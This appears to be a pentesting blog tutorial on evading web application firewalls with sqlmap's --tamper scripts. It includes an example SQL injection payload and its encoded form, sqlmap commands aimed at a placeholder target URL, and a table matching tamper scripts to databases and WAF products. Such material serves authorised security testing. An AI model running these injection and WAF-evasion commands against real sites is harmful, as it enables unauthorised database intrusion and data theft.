What is a WAF?

Web Application Firewall a.k.a WAF, acts as a “security guard” which takes care of what’s going in and out of a web app.

It is a filter with a set of rules that applies to an HTTP traffic and those rules commonly block the attacks like XSS and SQLi from happening.

Getting trouble with WAFs?

WAF is a huge pain in the….brain, especially when it comes to pentesting and performing SQL injection attacks.  Cry no more, SQLMap has an awesome command that you can use to bypass any WAF.

Behold…the tamper command, alongside with its tamper scripts.

The role of tamper is as the name implies, tamper or modify requests, in a way that it’ll evade and escape any detection rules that is set in the WAF.

Example:

Our commonly used SQLi payload “1 AND '1'='1” will look like “1 AND %EF%BC%871%EF%BC%87=%EF%BC%871” (apostrophemask is used).

WAFs are usually developed using a signature-based filtering, so attacks/payload shown above will most likely not be detected.  

Here are the list of all the tamper scripts available in sqlmap (Backbox).

tamper scripts in Backbox

Tho I am not quite sure if those scripts exists in your current standalone sqlmap installation. But worry not, you can download them all here https://github.com/sqlmapproject/sqlmap/tree/master/tamper .

How to use it?

Just like how we normally do with our test, we will just add –tamper parameter on our command.

The syntax:

sqlmap -u targeturl-waf.com/vulnerablepage.php?id=1 --tamper=charencode

Using two or more tamper scripts are separated by a comma (,).

sqlmap -u targeturl-waf.com/vulnerablepage.php?id=1 --tamper=charencode, between, equaltolike

Tamper scripts not in default installation?

sqlmap -u targeturl-waf.com/vulnerablepage.php?id=1 --tamper “tamperscript-dir/charencode.py”

For general testing, you may use:
charencode,charunicodeencode,chardoubleencode,apostrophemask,apostrophenullencode,base64encode,space2comment,space2plus,space2randomblank,between,equaltolike,greatest,ifnull2ifisnull,unmagicquotes,multiplespaces,nonrecursivereplacement,percentage,randomcase,unionalltounion

Note: There are specific tamper scripts for a corresponding WAFs, web programming languages and back-end. You can do a “hail mary” with all those scripts but it may affect the result of your test.
For example:
secureshpere = Imperva WAF
varnish = Varnish WAF
charunicodeencode = ASP/ASP.NET
equaltolike = PostgreSQL

TAMPERMySQLMSSQLOraclePostgreSQL
apostrophemask****
apostrophenullencode
appendnullbyte****
base64encode4,5,5.5200510g
between5.1
bluecoat****
apostrophemask9.0.32000,20059.3
charunicodeencode4,5.0 and 5.5200510g8.3,8.4,9.0
charencode*
commalessmid*
concat2concatws****
equaltolike****
greatest< 5.1
halfversionedmorekeywords5.0 and 5.5
ifnull2ifisnull****
informationschemacomment4,5.0,5.5200510g8.3,8.4,9.0
lowercase5.0
modsecurityversioned5.0
modsecurityzeroversioned****
multiplespaces****
nonrecursivereplacement****
overlongutf85.1.56,5.5.112000, 2005N/A9.0
percentage4, 5.0,5.5200510g8.3,8.4,9.0
randomcase****
randomcomments****
securesphere4,5.0,5.5200510g8.3,8.4,9.0
space2comment
space2dash4.0,5.0
space2hash>= 5.1.13
space2morehash2000, 2005
space2mssqlblank**
space2mssqlhash****
space2plus4,5.0,5.5200510g8.3,8.4,9.0
space2randomblank*
sp_password****
symboliclogical****
unionalltounion****
unmagicquotes4, 5.0,5.5200510g8.3,8.4,9.0
uppercase****
varnish*
versionedkeywords>=5.1.13
versionedmorekeywords****
xforwardedfor****

http://0xd0m7.blogspot.com/2016/02/understanding-tamper-option-in-sqlmap-ii.html
(*) It might work for all versions. 
(-) Does not apply 

SQLMap w/ tamper scripts in ACTION!

Here is what we usually get when we are testing a WAF enabled web app.

sqlmap without WAF bypass

Our attacks are being dropped, our connection is always timed out, we will wait for hours or days and end up with nothing.

Pause: Verify if the web app is actually using a WAF by using --check-waf command. If it does, you may now proceed on using the tamper scripts.

Here is what’ll happen when tamper scripts are used.

sqlmap with WAF bypass
sqlmap with WAF bypass
sqlmap with WAF bypass

In some but rare cases, the result may be a false positive. So it’s better if you’ll recheck and verify again its validity.

Reference/s:
https://github.com/sqlmapproject/sqlmap/tree/master/tamper
http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html
http://pentestmonkey.net/blog/exploiting-a-tricky-sql-injection-with-sqlmap
https://www.websec.ca/publication/Blog/Bypassing_WAFs_with_SQLMap

Tags:

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.